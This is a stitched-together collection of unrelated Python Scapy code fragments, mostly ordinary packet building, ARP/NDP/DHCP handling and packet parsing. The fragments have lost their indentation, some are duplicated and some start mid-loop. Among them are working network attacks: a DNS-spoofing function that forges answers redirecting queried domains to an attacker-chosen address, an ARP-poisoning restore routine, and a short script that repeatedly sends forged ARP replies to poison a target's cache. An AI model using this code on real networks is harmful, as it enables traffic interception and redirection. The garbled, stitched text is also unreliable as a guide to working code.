def send_frame(self, frame_body):
PACKET = Ether()
PACKET.length = 64
PACKET.dst = self.dst
PACKET.src = self.getHwAddr(self.interface)
if self.stag:
# WARNING: September/2016: This should be 0x88a8, but the Intel 10G
# hardware I am currently using does not support receiving a TPID of
# 0x88a8. So, I send double CTAGs, and I usually set this to 0x8100.
# (NOTE: The Intel hardware can send a TPID of 0x88a8)
PACKET.type = 0x8100
if self.ctag:
PACKET/=Dot1Q(type=0x8100,vlan=int(self.stag))
PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag))
else:
PACKET/=Dot1Q(type=self.etype,vlan=int(self.stag))
else:
if self.ctag:
PACKET.type = 0x8100
PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag))
else:
PACKET.type = self.etype
# PACKET/=Dot1Q(type=self.etype, vlan=int(self.ctag))
PACKET/=SlowProtocolsSubtype()/FlagsBytes()/OAMPDU()
PACKET/=frame_body
PACKET/=EndOfPDU()
if (self.verbose == True):
PACKET.show()
print '###[ Frame Length %d (before padding) ]###' % len(PACKET)
if (self.hexdump == True):
print hexdump(PACKET)
if (self.dryrun != True):
sendp(PACKET, iface=self.interface, verbose=self.verbose)
time.sleep(self.sleep)
return PACKET
def srp_packet(self, packet_bytes, iface):
decrypted = self.key.decrypt(packet_bytes)
packet = Ether(decrypted)
# This check makes sure to not forward local loopback heartbeat packets
if not packet[Ether].type == 0x9000:
print(RED + "PACKET RECIEVED, FORWARDING TO DCNET" + RESET)
packet.show()
def send_frame(self, frame_body):
PACKET = Ether()
PACKET.length = 64
PACKET.dst = self.dst
PACKET.src = self.getHwAddr(self.interface)
if self.stag:
# WARNING: September/2016: This should be 0x88a8, but the Intel 10G
# hardware I am currently using does not support receiving a TPID of
# 0x88a8. So, I send double CTAGs, and I usually set this to 0x8100.
# (NOTE: The Intel hardware can send a TPID of 0x88a8)
PACKET.type = 0x8100
if self.ctag:
PACKET/=Dot1Q(type=0x8100,vlan=int(self.stag))
PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag))
else:
PACKET/=Dot1Q(type=self.etype,vlan=int(self.stag))
else:
if self.ctag:
PACKET.type = 0x8100
PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag))
else:
PACKET.type = self.etype
# PACKET/=Dot1Q(type=self.etype, vlan=int(self.ctag))
PACKET/=SlowProtocolsSubtype()/FlagsBytes()/OAMPDU()
PACKET/=frame_body
PACKET/=EndOfPDU()
if (self.verbose == True):
PACKET.show()
print '###[ Frame Length %d (before padding) ]###' % len(PACKET)
if (self.hexdump == True):
print hexdump(PACKET)
if (self.dryrun != True):
sendp(PACKET, iface=self.interface, verbose=self.verbose)
time.sleep(self.sleep)
return PACKET
def send_dns_poison(host_mac: str, host_ip: str, received_packet: packet):
dnsrr = DNSRR()
dnsrr[DNSRR].rrname = received_packet[DNSQR].qname
dnsrr[DNSRR].type = 'A'
dnsrr[DNSRR].rclass = received_packet[DNSQR].qclass
dnsrr[DNSRR].ttl = 86400
dnsrr[DNSRR].rdata = settings['redirect spoofed domains to']
dns = Ether() / IP() / UDP() / DNS()
dns[Ether].src = attacker_mac
dns[Ether].dst = host_mac
dns[IP].dst = host_ip
dns[IP].src = received_packet[IP].dst
dns[UDP].dport = received_packet[UDP].sport
dns[UDP].sport = received_packet[UDP].dport
dns[DNS].id = received_packet[DNS].id
dns[DNS].ancount = 1
dns[DNS].qr = 1
dns[DNS].rd = 1
dns[DNS].qd = received_packet[DNS].qd
dns[DNS].an = dnsrr
if settings['show debug']:
dns.show()
sendp(dns, iface=interface, verbose=settings['show debug'])
if settings['show dns spoof']:
print('Spoofed DNS request from ' + host_ip + ' for ' +
dns[DNSQR].qname.decode()[:-1])
def sendEthMsg(dest_hw_addr, msg):
eth = Ether(type=0x800, dst=dest_hw_addr, src=get_if_hwaddr(conf.iface))
raw_payload = Raw(load=str(msg))
eth.add_payload(raw_payload)
if(debug):
print("\nsend eth header\n")
eth.show()
# send packet using socked on conf.iface, which is default interface (h1x1-eth0, etc)
sendp(eth, iface=conf.iface)
def __handle_pkt (self, pkt):
pkt_bin = base64.b64decode(pkt['binary'])
pkt_scapy = Ether(pkt_bin)
self.logger.info(format_text('\n\n#{} Port: {} {}\n'.format(pkt['index'], pkt['port'], self.format_origin(pkt['origin'])), 'bold', ''))
self.logger.info(format_text(' Type: {}, Size: {} B, TS: {:.2f} [sec]\n'.format(self.get_scapy_name(pkt_scapy), len(pkt_bin), pkt['ts'] - self.start_ts), 'bold'))
if self.is_brief:
self.logger.info(' {0}'.format(pkt_scapy.command()))
else:
pkt_scapy.show(label_lvl = ' ')
self.logger.info('')
return len(pkt_bin)
def send_arp_restore(dst_mac, dst_ip, src_mac, src_ip):
arp = Ether() / ARP()
arp[Ether].src = attacker_mac
arp[Ether].dst = dst_mac
arp[ARP].hwsrc = src_mac
arp[ARP].psrc = src_ip
arp[ARP].hwdst = dst_mac
arp[ARP].pdst = dst_ip
arp[ARP].op = 'is-at'
if settings['show debug']:
arp.show()
sendp(arp, iface=interface, verbose=settings['show debug'])
if settings['show arp poison']:
print('Restored ARP cache of ' + dst_ip +
', not pretending to be ' + src_ip)
def resolve_ndp(self, pg_interface=None):
"""Resolve NDP using provided packet-generator interface
:param pg_interface: interface used to resolve, if None then this
interface is used
"""
if pg_interface is None:
pg_interface = self
info("Sending NDP request for %s on port %s" %
(self.local_ip6, pg_interface.name))
ndp_req = self.create_ndp_req()
pg_interface.add_stream(ndp_req)
pg_interface.enable_capture()
self.test.pg_start()
info(self.test.vapi.cli("show trace"))
ndp_reply = pg_interface.get_capture()
if ndp_reply is None or len(ndp_reply) == 0:
info("No NDP received on port %s" % pg_interface.name)
return
ndp_reply = ndp_reply[0]
# Make Dot1AD packet content recognizable to scapy
if ndp_reply.type == 0x88a8:
ndp_reply.type = 0x8100
ndp_reply = Ether(str(ndp_reply))
try:
ndp_na = ndp_reply[ICMPv6ND_NA]
opt = ndp_na[ICMPv6NDOptDstLLAddr]
info("VPP %s MAC address is %s " %
(self.name, opt.lladdr))
self._local_mac = opt.lladdr
except:
error("Unexpected response to NDP request:")
error(ndp_reply.show())
raise
def send_dhcp_packet(self,
mac: MacAddress,
vlan: str,
state: DHCPState,
dhcp_desc: DHCPDescriptor = None):
"""
Send DHCP packet and record state in dhcp_client_state.
Args:
mac: MAC address of interface
state: state of DHCP packet
dhcp_desc: DHCP protocol state.
Returns:
"""
ciaddr = None
# generate DHCP request packet
if state == DHCPState.DISCOVER:
dhcp_opts = [("message-type", "discover")]
dhcp_desc = DHCPDescriptor(mac=mac,
ip="",
vlan=vlan,
state_requested=DHCPState.DISCOVER)
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
elif state == DHCPState.REQUEST:
dhcp_opts = [("message-type", "request"),
("requested_addr", dhcp_desc.ip),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.REQUEST
pkt_xid = dhcp_desc.xid
ciaddr = dhcp_desc.ip
elif state == DHCPState.RELEASE:
dhcp_opts = [("message-type", "release"),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.RELEASE
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
ciaddr = dhcp_desc.ip
else:
LOG.warning("Unknown egress request mac %s state %s", str(mac),
state)
return
dhcp_opts.append("end")
dhcp_desc.xid = pkt_xid
with self._dhcp_notify:
self.dhcp_client_state[mac.as_redis_key(vlan)] = dhcp_desc
pkt = Ether(src=str(mac), dst="ff:ff:ff:ff:ff:ff")
if vlan and vlan != "0":
pkt /= Dot1Q(vlan=int(vlan))
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(op=1, chaddr=mac.as_hex(), xid=pkt_xid, ciaddr=ciaddr)
pkt /= DHCP(options=dhcp_opts)
LOG.debug("DHCP pkt xmit %s", pkt.show(dump=True))
sendp(pkt, iface=self._dhcp_interface, verbose=0)
def sendProbes():
dstAddr = "10.0.2.22"
iface = "H11-eth0"
print "sending probes on interface %s to %s" % (iface, dstAddr)
port_list = [4, 2, 4, 1, 1]
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP() / UDP(dport=PORT_FWD)
for port in port_list[:-1]:
pkt /= FWD_Label(outport=port, tos=0)
pkt /= FWD_Label(outport=port_list[-1], tos=1)
pkt /= TMY_Proto_Header(proto=0xff)
pkt /= TMY_INST_Label(switch_id=6, bit_egress_port=1, tos=1)
pkt /= TMY_DATA_Header(label_cnt=0)
# pkt /= TMY_INST_Label(switch_id=6, bit_ingress_port=1, tos=1)
pkt.show()
# sendpfast(pkt, pps=2, loop=200, file_cache=True, iface=iface)
sendp(pkt, iface=iface)
def dfSeriesToPacket(self, series):
series.tolist()
bytes = ""
label = series[0]
enumerate = series[1:]
for i in enumerate:
bytes += chr(int(round(float(i) * 255)))
if (label == "ARP"):
packet = Ether(bytes)
elif (label == "ICMP"):
packet = IP(bytes)
packet.time = 0
packet[ICMP].time = 0
if (packet[ICMP].type == 13
or packet[ICMP].type == "timestamp-request"
or packet[ICMP].type == 14
or packet[ICMP].type == "timestamp-reply"):
packet.show()
elif (label[0:4] == "IPv6"):
packet = IPv6(bytes)
else:
packet = IP(bytes)
packet.time = 0
if TCP in packet:
packet[TCP].time = 0
for i in xrange(len(packet[TCP].options)):
if (packet[TCP].options[i][0] == "Timestamp"):
packet[TCP].options[i] = ("Timestamp", (0, 0))
packet[TCP].seq = 0
packet[TCP].ack = 0
elif UDP in packet:
packet.time = 0
packet[UDP].time = 0
elif ICMP in packet:
packet = IP(bytes)
packet.time = 0
packet[ICMP].time = 0
else:
packet = IP(bytes)
packet.show()
packet.time = 0
return label, packet
def bytesModifyBytes(self, X, Y):
bytes = ""
enumerate = X.split(',')
for i in enumerate:
bytes += chr(int(round(float(i) * 255)))
if (Y == "ARP"):
packet = Ether(bytes)
elif (Y == "ICMP"):
packet = IP(bytes)
packet.time = 0
packet[ICMP].time = 0
if (packet[ICMP].type == 13
or packet[ICMP].type == "timestamp-request"
or packet[ICMP].type == 14
or packet[ICMP].type == "timestamp-reply"):
packet.show()
elif (Y[0:4] == "IPv6"):
packet = IPv6(bytes)
else:
packet = IP(bytes)
packet.time = 0
if TCP in packet:
packet[TCP].time = 0
for i in xrange(len(packet[TCP].options)):
if (packet[TCP].options[i][0] == "Timestamp"):
packet[TCP].options[i] = ("Timestamp", (0, 0))
packet[TCP].seq = 0
packet[TCP].ack = 0
elif UDP in packet:
packet.time = 0
packet[UDP].time = 0
elif ICMP in packet:
packet = IP(bytes)
packet.time = 0
packet[ICMP].time = 0
else:
packet = IP(bytes)
packet.show()
packet.time = 0
return self.packetToBytes(packet)
def _get_gw_mac_address(self, ip: IPAddress, vlan: str = "") -> str:
try:
gw_ip = ipaddress.ip_address(ip.address)
self.logger.debug("sending arp via egress: %s",
self.config.non_nat_arp_egress_port)
eth_mac_src = get_if_hwaddr(self.config.non_nat_arp_egress_port)
psrc = "0.0.0.0"
egress_port_ip = get_if_addr(self.config.non_nat_arp_egress_port)
if egress_port_ip:
psrc = egress_port_ip
pkt = Ether(dst=ETHER_BROADCAST, src=eth_mac_src)
if vlan.isdigit():
pkt /= Dot1Q(vlan=int(vlan))
pkt /= ARP(op="who-has", pdst=gw_ip, hwsrc=eth_mac_src, psrc=psrc)
self.logger.debug("ARP Req pkt %s", pkt.show(dump=True))
res = srp1(pkt,
type=ETH_P_ALL,
iface=self.config.non_nat_arp_egress_port,
timeout=1,
verbose=0,
nofilter=1,
promisc=0)
if res is not None:
self.logger.debug("ARP Res pkt %s", res.show(dump=True))
if str(res[ARP].psrc) != str(gw_ip):
self.logger.warning(
"Unexpected IP in ARP response. expected: %s pkt: %s",
str(gw_ip), res.show(dump=True))
return ""
if vlan.isdigit():
if Dot1Q in res and str(res[Dot1Q].vlan) == vlan:
mac = res[ARP].hwsrc
else:
self.logger.warning(
"Unexpected vlan in ARP response. expected: %s pkt: %s",
vlan, res.show(dump=True))
return ""
else:
mac = res[ARP].hwsrc
return mac
else:
self.logger.debug("Got Null response")
return ""
except Scapy_Exception as ex:
self.logger.warning("Error in probing Mac address: err %s", ex)
return ""
except ValueError:
self.logger.warning("Invalid GW Ip address: [%s] or vlan %s",
str(ip), vlan)
return ""
def getDNSPacket(self):
"""
构造DNS报文
:return:
"""
try:
dns = DNS()
dns.id = int(self.entries[0].get())
dns.qr = int(self.entries[1].get())
dns.opcode = int(self.entries[2].get())
dns.rd = int(self.entries[3].get())
dns.qd = DNSQR(qname=self.entries[4].get())
udp = UDP()
ip = IP()
ip.dst = self.entries[5].get()
dns_packet = Ether() / ip / udp / dns
dns_packet.show()
self.resultText.insert('end', dns_packet.summary() + '\n')
self.resultText.insert('end', str(dns_packet) + '\n')
return dns_packet
except Exception as e:
print(e.with_traceback())
finally:
pass
def _get_gw_mac_address(self, ip: IPv4Address) -> str:
try:
gw_ip = ipaddress.ip_address(ip.address)
self.logger.debug("sending arp via egress: %s",
self.config.non_nat_arp_egress_port)
eth_mac_src = get_if_hwaddr(self.config.non_nat_arp_egress_port)
psrc = "0.0.0.0"
egress_port_ip = get_if_addr(self.config.non_nat_arp_egress_port)
if egress_port_ip:
psrc = egress_port_ip
pkt = Ether(dst=ETHER_BROADCAST, src=eth_mac_src)
pkt /= ARP(op="who-has", pdst=gw_ip, hwsrc=eth_mac_src, psrc=psrc)
self.logger.debug("ARP Req pkt %s", pkt.show(dump=True))
res = srp1(pkt,
type=ETH_P_ARP,
iface=self.config.non_nat_arp_egress_port,
timeout=1,
verbose=0,
nofilter=1,
promisc=0)
if res is not None:
self.logger.debug("ARP Res pkt %s", res.show(dump=True))
mac = res[ARP].hwsrc
return mac
else:
self.logger.debug("Got Null response")
return ""
except Scapy_Exception as ex:
self.logger.warning("Error in probing Mac address: err %s", ex)
return ""
except ValueError:
self.logger.warning("Invalid GW Ip address: [%s]", ip)
return ""
def resolve_arp(self, pg_interface=None):
"""Resolve ARP using provided packet-generator interface
:param pg_interface: interface used to resolve, if None then this
interface is used
"""
if pg_interface is None:
pg_interface = self
info("Sending ARP request for %s on port %s" %
(self.local_ip4, pg_interface.name))
arp_req = self.create_arp_req()
pg_interface.add_stream(arp_req)
pg_interface.enable_capture()
self.test.pg_start()
info(self.test.vapi.cli("show trace"))
arp_reply = pg_interface.get_capture()
if arp_reply is None or len(arp_reply) == 0:
info("No ARP received on port %s" % pg_interface.name)
return
arp_reply = arp_reply[0]
# Make Dot1AD packet content recognizable to scapy
if arp_reply.type == 0x88a8:
arp_reply.type = 0x8100
arp_reply = Ether(str(arp_reply))
try:
if arp_reply[ARP].op == ARP.is_at:
info("VPP %s MAC address is %s " %
(self.name, arp_reply[ARP].hwsrc))
self._local_mac = arp_reply[ARP].hwsrc
else:
info("No ARP received on port %s" % pg_interface.name)
except:
error("Unexpected response to ARP request:")
error(arp_reply.show())
raise
for z in range(32):
value_ += 1 * 10000000
value = value_
value = value_ * -1
# if count % 2 == 1 :
# value = value_ * -1
pkt = pkt / ENTRY(value=value)
else:
for z in range(32):
value_ += 1 * 10000000
value = value_
# if count % 2 == 1 :
# value = value_ * -1
pkt = pkt / ENTRY(value=value)
pkt.show()
print(hexdump(pkt))
print(len(pkt))
count += 1
print(count)
sendp(pkt, iface=args.i)
seg_number += 1
# data1 = Ether(dst=MACS[sys.argv[2]]) / IP(dst="10.10.0.1") / UDP(dport=10000) / PREAMBLE(number_of_entries=4,seg_number=1) / ENTRY(key=1,value=1) / ENTRY(key="b",value=2) / ENTRY(key="c",value=3) / ENTRY(key="d",value=4)/ ENTRY(key="d",value=5) / ENTRY(key="d",value=6) / ENTRY(key="d",value=7) / ENTRY(key="d",value=8) / ENTRY(key="d",value=9) / ENTRY(key="d",value=10)
# data2 = Ether(dst=MACS[sys.argv[2]]) / IP(dst="10.0.1.10") / UDP(dport=10000) / PREAMBLE(number_of_entries=2,tree_id=2) / ENTRY(key='AA',value=5) / ENTRY(key="BB",value=6)
# for i in range(int(sys.argv[3])):
# sendp(data2, iface = sys.argv[1])
# PACKET TO SKIP
import sys
from scapy.layers.l2 import Ether, ARP, sendp
from scapy.layers.l2 import getmacbyip
if __name__ == '__main__':
if len(sys.argv) < 3:
sys.exit(1)
target_ip = sys.argv[1]
host = sys.argv[2]
target_mac = getmacbyip(target_ip)
host_mac = getmacbyip(host)
pkt = Ether() / ARP(
op='is-at', psrc=host, pdst=target_ip, hwdst=target_mac)
print(pkt.show())
try:
sendp(pkt, inter=2, loop=1)
except KeyboardInterrupt:
print('Cleaning...')
sendp(Ether(src=host_mac) / ARP(op='is-at',
psrc=host,
hwsrc=host_mac,
pdst=target_ip,
hwdst=target_mac),
inter=1,
count=3)
# pkt_analyzer = PacketAnalyzer(False)
print("Daemon created\n")
# pkt_raw_list = db.read_all_pkt_raw()
# pkt_features_list = db.read_all_pkt_features()
id_list = [2]
pkt_raw_list = []
# fp = fopen('length_pkt.pcap')
for id in id_list:
pkt_raw = db.read_raw_by_id(id)
print (parse_packet(Ether(pkt_raw[2])))
pkt_raw_list.append(pkt_raw[2])
eth_pkt = Ether(pkt_raw[2])
eth_pkt.show()
print("IP chk", eth_pkt[IP].chksum)
print(eth_pkt[UDP].chksum)
#CHange IP
eth_pkt[IP].dst = "192.168.101.106"
# Recompute chksum
del eth_pkt[IP].chksum
del eth_pkt[UDP].chksum
eth_pkt.show2(dump=False)
sendp(eth_pkt, iface='eth2', count = 10000, inter=0.001)#, return_packets = True)
# Write the list to pcap
# write(pkt_raw_list)
def extract_one_packet(buf):
"""Extract one packet from the incoming buf buffer.
Takes string as input and looks for first whole packet in it.
If it finds one, it returns substring from the buf parameter.
:param buf: String representation of incoming packet buffer.
:type buf: str
:returns: String representation of first packet in buf.
:rtype: str
"""
pkt_len = 0
if len(buf) < 60:
return None
try:
ether_type = Ether(buf[0:14]).type
except AttributeError:
raise RuntimeError(f"No EtherType in packet {buf!r}")
if ether_type == ETH_P_IP:
# 14 is Ethernet fame header size.
# 4 bytes is just enough to look for length in ip header.
# ip total length contains just the IP packet length so add the Ether
# header.
pkt_len = Ether(buf[0:14 + 4]).len + 14
if len(buf) < 60:
return None
elif ether_type == ETH_P_IPV6:
if not Ether(buf[0:14 + 6]).haslayer(IPv6):
raise RuntimeError(f"Invalid IPv6 packet {buf!r}")
# ... to add to the above, 40 bytes is the length of IPV6 header.
# The ipv6.len only contains length of the payload and not the header
pkt_len = Ether(buf)[u"IPv6"].plen + 14 + 40
if len(buf) < 60:
return None
elif ether_type == ETH_P_ARP:
pkt = Ether(buf[:20])
if not pkt.haslayer(ARP):
raise RuntimeError(u"Incomplete ARP packet")
# len(eth) + arp(2 hw addr type + 2 proto addr type
# + 1b len + 1b len + 2b operation)
pkt_len = 14 + 8
pkt_len += 2 * pkt.getlayer(ARP).hwlen
pkt_len += 2 * pkt.getlayer(ARP).plen
del pkt
elif ether_type == 32821: # RARP (Reverse ARP)
pkt = Ether(buf[:20])
pkt.type = ETH_P_ARP # Change to ARP so it works with scapy
pkt = Ether(pkt)
if not pkt.haslayer(ARP):
pkt.show()
raise RuntimeError(u"Incomplete RARP packet")
# len(eth) + arp(2 hw addr type + 2 proto addr type
# + 1b len + 1b len + 2b operation)
pkt_len = 14 + 8
pkt_len += 2 * pkt.getlayer(ARP).hwlen
pkt_len += 2 * pkt.getlayer(ARP).plen
del pkt
else:
raise RuntimeError(f"Unknown protocol {ether_type}")
if pkt_len < 60:
pkt_len = 60
if len(buf) < pkt_len:
return None
return buf[0:pkt_len]
def print_event(ctx, data, size):
event = b['events'].event(data)
print("{:<18.9f} {:<4} {:<16} {:<10} {:<32} {:<4} {:<10} {:<10}".format(
event.ts / 1000000000,
event.cpu, event.comm.decode("utf-8"), event.pid,
event.dpif_name.decode("utf-8"), event.upcall_type, event.pkt_size,
event.key_size))
#
# Dump flow key information
#
if event.key_size < options.flow_key_size:
key_len = event.key_size
else:
key_len = options.flow_key_size
if options.flow_key_decode != 'none':
print(" Flow key size {} bytes, size captured {} bytes.".format(
event.key_size, key_len))
if options.flow_key_decode == 'hex':
#
# Abuse scapy's hex dump to dump flow key
#
print(
re.sub('^',
' ' * 4,
hexdump(Ether(bytes(event.key)[:key_len]), dump=True),
flags=re.MULTILINE))
if options.flow_key_decode == 'nlraw':
nla = decode_nlm(bytes(event.key)[:key_len])
else:
nla = decode_nlm(bytes(event.key)[:key_len], dump=False)
if "OVS_KEY_ATTR_IN_PORT" in nla:
port = struct.unpack("=I", nla["OVS_KEY_ATTR_IN_PORT"])[0]
else:
port = "Unknown"
#
# Decode packet only if there is data
#
if event.pkt_size <= 0:
return
pkt_id = get_pkt_id()
if event.pkt_size < options.packet_size:
pkt_len = event.pkt_size
pkt_data = bytes(event.pkt)[:event.pkt_size]
else:
pkt_len = options.packet_size
pkt_data = bytes(event.pkt)
if options.packet_decode != 'none' or options.pcap is not None:
print(" {}: Receive dp_port {}, packet size {} bytes, size "
"captured {} bytes.".format(pkt_id, port, event.pkt_size,
pkt_len))
if options.packet_decode == 'hex':
print(
re.sub('^',
' ' * 4,
hexdump(pkt_data, dump=True),
flags=re.MULTILINE))
packet = Ether(pkt_data)
packet.wirelen = event.pkt_size
if options.packet_decode == 'decode':
print(re.sub('^', ' ' * 4, packet.show(dump=True), flags=re.MULTILINE))
if options.pcap is not None:
wrpcap(options.pcap, packet, append=True, snaplen=options.packet_size)
def getScapyFrame(self):
scapyEthernetFrame = Ether(src=self.src, dst=self.dst, type=self.type)
scapyEthernetFrame.show()
return scapyEthernetFrame
